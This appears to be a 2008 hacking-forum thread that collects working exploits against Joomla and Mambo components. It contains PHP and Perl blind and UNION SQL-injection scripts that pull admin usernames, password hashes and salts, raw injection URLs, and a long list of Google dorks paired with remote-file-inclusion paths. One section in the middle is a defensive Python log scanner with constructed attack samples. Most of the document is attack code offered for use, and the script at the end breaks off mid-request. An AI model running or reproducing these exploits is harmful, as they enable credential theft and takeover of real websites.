$where=(!empty($_GET['user']))?"where username='".$_GET['user']."'":'limit 0,1';
$id=(!empty($_GET['id']))?$_GET['id']:'1';
//functions
function send_xpl($url, $xpl){
global $id;
$u=parse_url($url);
$req ="GET ".$u['path']."components/com_datsogallery/sub_votepic.php?id=$id&user_rating=1 HTTP/1.1\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="User-Agent: ".$xpl."\r\n";
$req.="Connection: Close\r\n\r\n";
$fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
$res=fread($fs, 4096);
fclose($fs);
return $res;
}
function xpl($condition, $pos){
global $norm_ua;
global $where;
$xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*";
return $xpl;
}
//main
echo '<title>Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+</title>';
if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\n<br>username&pic_id - optional\n");
send_xpl($url, $norm_ua);
//get md5
for($i=0;$i<=32;$i++){
$buff=send_xpl($url,xpl('>58', $i));
if(preg_match('/Duplicate entry/', $buff)){
for($j=97;$j<=102;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=48;$j<=57;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
}
//check Joomla version
$test=rand(1,100000)."'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*";
$buff=send_xpl($url,$test);
if(preg_match('/Duplicate entry/', $buff)) die($pass);
//separator
$pass.=':';
//get salt
for($i=33;$i<=49;$i++){
$buff=send_xpl($url,xpl('>58', $i));
if(preg_match('/Duplicate entry/', $buff)){
$buff=send_xpl($url, xpl('>91',$i));
if(preg_match('/Duplicate entry/', $buff)){
for($j=97;$j<=122;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=65;$j<=90;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
} elseif(preg_match('/Subquery returns more than 1 row/', $buff)){
for($j=48;$j<=57;$j++){
if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; }
}
} else {
die("exploit failed");
}
}
echo $pass;
Author : +toxa+
Joomla Component xsstream-dm 0.01 Beta SQL Injection
#!/usr/bin/perl -w
################################################## #######
# Joomla Component xsstream-dm 0.01 Beta Remote SQL Injection #
# download : http://sstreamtv.com/index.php?option=com_docman&task=doc_details&gid=24
################################################## #######
########################################
# Founded by : Houssamix From H-T Team
# H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
# Dork inurl:"index.php?option=com_xsstream-dm"
# Greetz : CoNaN & HaCkeR_EgY & All friends & All muslims HaCkeRs :)
########################################
# Script_Name: "Joomla"
# Component_Name: "xsstream-dm" 0.01 Beta
########################################
print "\t\t############################################## ##########\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t############################################## ##########\n\n";
print "\t\t# Joomla Component (xsstream-dm) Remote SQL Injection #\n\n";
print "\t\t# by Houssamix & Stack-Terrorist #\n\n";
print "\t\t# from H-T Team & v4 Team #\n\n";
print "\t\t############################################## ##########\n\n";
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$tab="jos_users";
#the the union of joomla
$un="/**/union/**/select/**/";
#the vulnerable compenent
$com="com_xsstream-dm&Itemid";
# Lets star exploiting
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$user.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2/**/from/**/".$tab."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /<div class="contentpagetitle">(.*?)<\/div>/){
print "\n[+] Admin User : $1";
}
$host2 = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$pass.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2/**/from/**/".$tab."/**";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t# Exploit has ben aported user and password hash #\n\n";
}
else{print "\n[-] Exploit Failed...\n";}
# exploit discovered by Houssamix From H-T Team
# exploit exploited by Stack-Terrorist
(c) by Houssamix & Stack-Terrorist
baltazar
19.05.2008, 19:05
Joomla Component com_galeria Remote SQL Injection Vulnerability
################################################## #############
#
# joomla SQL Injection(com_galeria)
#
################################################## #############
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAIL : hackturkiye.hackturkiye@gmail.com
#
################################################## ##############
#
# DORK 1 : allinurl: "com_galeria"
#
# DORK 2 : allinurl: id "com_galeria"
#
################################################## ##############
EXPLOIT :
index.php?option=com_galeria&Itemid=S@BUN&func=detail&id=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0,1,1,1,1,1,1,444 ,555,666,username/**/from/**/users/*
################################################## ##############
# S@BUN i AM NOT HACKER S@BUN
################################################## ##############
Table prefix disclosure in the datsogallery component
If requesting the page
http://www.domain.ru/path/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
returns a number, then on a repeated request the page will spit out the error
DB function failed with error number 1062
Duplicate entry '1-83.142.***.***83.142.***.***Opera/9.27 (Windows NT 5.1; U; ru)' for key 1 SQL=INSERT INTO jos_datsogallery_votes ( vpic, vip ) VALUES ( 1, '83.142.***.***83.142.***.***Opera/9.27 (Windows NT 5.1; U; ru)' )
does not work on all versions
example _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
Table prefix disclosure in the datsogallery component
If requesting the page
returns a number, then on a repeated request the page will spit out the error
does not work on all versions
example _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
Um... that is exactly what my exploit is based on =\ Only the prefix does not matter in my case, because #__ is replaced with the current prefix when the corresponding Joomla function processes it
baltazar
23.05.2008, 20:21
Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
################################################################
#
# joomla com_garyscookbook SQL Injection(id)
#
################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# there are a lot of sites but the exploit is not working for all of them; I found a lot
#
# DORK 1 : allinurl:"com_garyscookbook"
#
# DORK 2 : allinurl: com_garyscookbook "detail"
#
################################################################
EXPLOIT :
index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
<name>garyscookbook</name>
<creationDate>4-9-2005</creationDate>
<author>Gerald Berger</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>gerald@vb-dozent.net</authorEmail>
<authorUrl>www.vb-dozent.net</authorUrl>
<version>1.1.1</version>
<description>Garys Cookbook is a fully integrated Mambo Cookbook component.</description>
found this on my computer, dunno, might be old news
Google Dork:
inurl:"com_flyspray"
Append to site URL:
/components/com_flyspray/startdown.php?file=shell
Google Dork:
inurl:"com_admin"
Append to site URL:
administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
Google Dork:
inurl:index.php?option=com_simpleboard
Append to site URL:
/components/com_simpleboard/file_upload.php?sbp=shell
Google Dork:
inurl:"com_hashcash"
Append to site URL:
/components/com_hashcash/server.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_htmlarea3_xtd-c"
Append to site URL:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_sitemap"
Append to site URL:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_performs"
Append to site URL:
components/com_performs/performs.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_forum"
Append to site URL:
/components/com_forum/download.php?phpbb_root_path=
Google Dork:
inurl:"com_pccookbook"
Append to site URL:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
Google Dork:
inurl:index.php?option=com_extcalendar
Append to site URL:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"minibb"
Append to site URL:
components/minibb/index.php?absolute_path=shell
Google Dork:
inurl:"com_smf"
Append to site URL:
/components/com_smf/smf.php?mosConfig_absolute_path=
Append to site URL (2):
/modules/mod_calendar.php?absolute_path=shell
Google Dork:
inurl:"com_pollxt"
Append to site URL:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_loudmounth"
Append to site URL:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_videodb"
Append to site URL:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell
Google Dork:
inurl:index.php?option=com_pcchess
Append to site URL:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_multibanners"
Append to site URL:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_a6mambohelpdesk"
Append to site URL:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell
Google Dork:
inurl:"com_colophon"
Append to site URL:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_mgm"
Append to site URL:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_mambatstaff"
Append to site URL:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_securityimages"
Append to site URL:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell
Append to site URL (2):
/components/com_securityimages/lang.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_artlinks"
Append to site URL:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_galleria"
Append to site URL:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_akocomment"
Append to site URL:
/akocomments.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_cropimage"
Append to site URL:
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
Google Dork:
inurl:"com_kochsuite"
Append to site URL:
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_comprofiler"
Append to site URL:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_zoom"
Append to site URL:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
Append to site URL (2):
/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_serverstat"
Append to site URL:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell
Google Dork:
inurl:"com_fm"
Append to site URL:
components/com_fm/fm.install.php?lm_absolute_path=shell
Google Dork:
inurl:com_mambelfish
Append to site URL:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_lmo
Append to site URL:
components/com_lmo/lmo.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_linkdirectory
Append to site URL:
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_mtree
Append to site URL:
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_jim
Append to site URL:
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_webring
Append to site URL:
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell
Google Dork:
inurl:com_remository
Append to site URL:
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Google Dork:
inurl:com_babackup
Append to site URL:
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_lurm_constructor
Append to site URL:
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell
Google Dork:
inurl:com_mambowiki
Append to site URL:
components/com_mambowiki/MamboLogin.php?IP=shell
Google Dork:
inurl:com_a6mambocredits
Append to site URL:
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell
Google Dork:
inurl:com_phpshop
Append to site URL:
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_cpg
Append to site URL:
components/com_cpg/cpg.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_moodle
Append to site URL:
components/com_moodle/moodle.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_extended_registration
Append to site URL:
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_mospray
Append to site URL:
components/com_mospray/scripts/admin.php?basedir=shell
Google Dork:
inurl:com_bayesiannaivefilter
Append to site URL:
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_uhp
Append to site URL:
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_peoplebook
Append to site URL:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_mmp
Append to site URL:
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_reporter
Append to site URL:
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_madeira
Append to site URL:
/components/com_madeira/img.php?url=shell
Google Dork:
inurl:com_jd-wiki
Append to site URL:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell
Google Dork:
inurl:com_bsq_sitestats
Append to site URL:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
Append to site URL (2):
/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
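Every entry in the list above is the same Mambo/Joomla 1.0 remote-file-inclusion shape that the Mambo 4.6.4 post further down shows in source: a component script does require_once($mosConfig_absolute_path . '/...') (or the same with $absolute_path, $lm_absolute_path, $basedir and so on) without a defined('_VALID_MOS') guard, so with register_globals=On, and allow_url_fopen/allow_url_include available as they were in PHP of that era, the query string supplies the include path. The following Python is an added example for this page, not code from the post or from any of the exploits: the detection side, a scanner over Apache combined-format access-log lines that flags the parameter names collected above when they carry a remote URL, and the UNION and boolean-blind SQL-injection shapes used elsewhere in the thread. The log lines in SAMPLE_LOG are constructed; the parameter set, the keyword regexes and the component_of() heuristic are my assumptions drawn from the posted payloads, and the generic names file and url are only treated as hits together with the remote-URL check to keep false positives down.

```python
"""Added example: flag the RFI and SQL-injection probes seen in this thread in
Apache combined-format access logs. SAMPLE_LOG is constructed for the demo;
RFI_PARAMS and SQLI_PATTERNS are assumptions drawn from the posted vectors."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache combined: ip ident user [time] "METHOD uri HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Globals the Mambo/Joomla 1.0 components include() from; with register_globals=On
# a query parameter of the same name overrides them. Generic names (file, url)
# only count together with the remote-URL check below.
RFI_PARAMS = {
    "mosConfig_absolute_path", "mosConfig_live_site", "absolute_path",
    "lm_absolute_path", "phpbb_root_path", "basedir", "baseDir", "component_dir",
    "cropimagedir", "ff_compath", "sbp", "IP", "file", "url",
}
REMOTE_VALUE = re.compile(r"^(?:https?|ftp)://", re.I)

# Keywords may be separated by spaces, '+' (decoded to a space below) or /**/.
SEP = r"(?:\s|/\*\*/)+"
SQLI_PATTERNS = {
    "union-select": re.compile(r"\bunion" + SEP + r"(?:all" + SEP + r")?select\b", re.I),
    "blind-substring": re.compile(r"\b(?:substring|substr|mid)\s*\(\s*\(?\s*select\b", re.I),
    "users-table": re.compile(r"\bfrom" + SEP + r"(?:mysql\.user|\w+_users)\b", re.I),
    "tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
}


def component_of(path, params):
    """Joomla names the component in option=com_x; direct-file RFI has it in the path."""
    if "option" in params:
        return params["option"]
    m = re.search(r"/(com_[\w-]+)/", path)
    return m.group(1) if m else None


def analyze(line):
    """Return a finding dict for one log line, or None if it is clean or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    pairs = parse_qsl(parts.query, keep_blank_values=True)  # percent-decoded pairs
    findings = []
    for name, value in pairs:
        if name in RFI_PARAMS and REMOTE_VALUE.match(value):
            findings.append(("rfi", f"{name}={value}"))
    decoded = unquote_plus(parts.query)  # whole query string, '+' and %XX decoded
    for label, pattern in SQLI_PATTERNS.items():
        if pattern.search(decoded):
            findings.append(("sqli", label))
    if not findings:
        return None
    return {
        "ip": m.group("ip"), "time": m.group("time"), "path": parts.path,
        "component": component_of(parts.path, dict(pairs)), "findings": findings,
    }


def scan(lines):
    """Analyze every non-empty line; returns only the lines with findings."""
    return [hit for hit in (analyze(l) for l in lines if l.strip()) if hit]


# Constructed sample: an RFI probe, a UNION probe, a blind probe, two clean requests.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Jun/2008:13:01:02 +0000] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://198.51.100.9/c.txt? HTTP/1.1" 200 4102 "-" "Mozilla/4.0"
203.0.113.7 - - [22/Jun/2008:13:01:05 +0000] "GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users-- HTTP/1.1" 200 9931 "-" "Mozilla/4.0"
203.0.113.7 - - [22/Jun/2008:13:02:10 +0000] "GET /index.php?option=com_mycontent&task=view&id=10%20and%20(SUBSTRING((SELECT%20password%20FROM%20jos_users%20LIMIT%200,1%20),1,1))=CHAR(48) HTTP/1.1" 200 7310 "-" "libwww-perl/5.805"
198.51.100.23 - - [22/Jun/2008:13:03:00 +0000] "GET /index.php?option=com_content&task=view&id=12&Itemid=9 HTTP/1.1" 200 8123 "http://example.test/" "Mozilla/5.0"
198.51.100.23 - - [22/Jun/2008:13:03:04 +0000] "GET /components/com_flyspray/startdown.php?file=readme.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["ip"], hit["component"], hit["path"], hit["findings"])
```

Run it as-is to see the three hits; feed a real access log with `scan(open(path))`. The last sample line shows why the remote-URL condition matters: com_flyspray's file= parameter is on the list, but a local value is normal traffic.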
~!DoK_tOR!~
02.06.2008, 15:37
Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component mycontent Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Contact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl mycontent.pl host path <options> #\n";
print " # Example: perl mycontent.pl www.host.com /joomla/ -r 10 #\n";
print " # #\n";
print " # Options: #\n";
print " # -r Valid id #\n";
print " # Note: #\n";
print " # If the exploit failed #\n";
print " # Change 'regexp' value to the title of the page #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $rid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "r=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"r"})
{
$rid = $options{"r"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $rid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $rid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $rid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "E-mail";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-01]
Joomla Component JooBB 0.5.9 Blind SQL Injection Exploit
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component Joo!BB Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Contact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl jobb.pl host path <options> #\n";
print " # Example: perl jobb.pl www.host.com /joomla/ -f 1 #\n";
print " # #\n";
print " # Options: #\n";
print " # -f Forum id #\n";
print " # Note: #\n";
print " # If you need to change the match value so do it :D #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $fid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"f"})
{
$fid = $options{"f"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $fid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Announcements";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-01]
baltazar
03.06.2008, 01:11
Joomla Component acctexp <= 0.12.x Blind SQL Injection Ex
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component acctexp Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Contact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl acctexp.pl host path <options> #\n";
print " # Example: perl acctexp.pl www.host.com /joomla/ -g 1 #\n";
print " # #\n";
print " # Options: #\n";
print " # -g usage id #\n";
print " # Note: #\n";
print " # Don't forget to change the match if you have to do it :)#\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $gid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "g=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"g"})
{
$gid = $options{"g"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $gid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $gid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $rid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_acctexp&task=subscribe&usage=".$gid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Verify Password";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
otmorozok428
04.06.2008, 20:22
Joomla Component jotloader <= 1.2.1.a Blind SQL injection
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
print " o Joomla Component jotloader Blind SQL Injection Exploit o\n";
print " o Author:His0k4 [ALGERIAN HaCkeR] o\n";
print " o o\n";
print " o Contact: His0k4.hlm[at]gamil.com o\n";
print " o Greetz: All friends & muslims HacKeRs o\n";
print " o o\n";
print " o Dork : inurl:com_jotloader o\n";
print " o Usage: perl jotloader.pl host path <options> o\n";
print " o Example: perl jotloader.pl www.host.com /joomla/ -c 5 o\n";
print " o o\n";
print " o Options: o\n";
print " o -c valid cid id o\n";
print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $cid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "c=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"c"})
{
$cid = $options{"c"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $cid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $cid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $cid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_jotloader&cid=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "files.download";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-04]
Joomla Component EasyBook 1.1 SQL Injection Exploit
#!/usr/bin/perl
use IO::Socket;
use strict;
##### INFO##############################
# Example: #
# Host: artsbymonique.lu #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################
print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gbid= --+-\n";
print "-+-- Dork: com_easybook --+-\n\n";
print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);
my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connect!");
print $socket "POST /index.php HTTP/1.0\n".
"Host: www.$host\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: 214\n\n".
